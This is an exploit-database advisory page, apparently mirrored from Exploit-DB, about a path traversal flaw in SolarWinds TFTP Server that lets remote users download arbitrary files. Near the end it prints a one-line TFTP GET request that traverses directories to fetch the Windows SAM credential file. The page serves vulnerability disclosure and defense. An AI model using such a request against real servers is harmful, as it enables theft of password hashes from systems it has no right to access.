Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
SolarWinds TFTP Server Arbitrary File Retrieval Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
TFTP Server
by:
Unknown
5
CVSS
MEDIUM
Arbitrary File Retrieval
22
CWE
Product Name: TFTP Server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2003-0361
CPE: a:solarwinds:tftp_server
Metasploit:
Other Scripts:
Platforms Tested: Windows
2003

SolarWinds TFTP Server Arbitrary File Retrieval Vulnerability

The SolarWinds TFTP Server does not properly handle user-supplied input. Due to insufficient handling of user input, it is possible for a remote user to request arbitrary files from the vulnerable server. It would be possible for a remote user to download any files readable through the permissions of the TFTP Server user.

Mitigation:

Upgrade to a version not affected by this vulnerability. It is recommended to use a different TFTP server software.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6045/info

SolarWinds TFTP Server is distributed for the Microsoft Windows platform.

The SolarWinds TFTP Server does not properly handle user-supplied input. Due to insufficient handling of user input, it is possible for a remote user to request arbitrary files from the vulnerable server. It would be possible for a remote user to download any files readable through the permissions of the TFTP Server user.

tftp example.com GET a\..\..\winnt\repair\sam

Navigation

Suggest Exploit

Services By CQR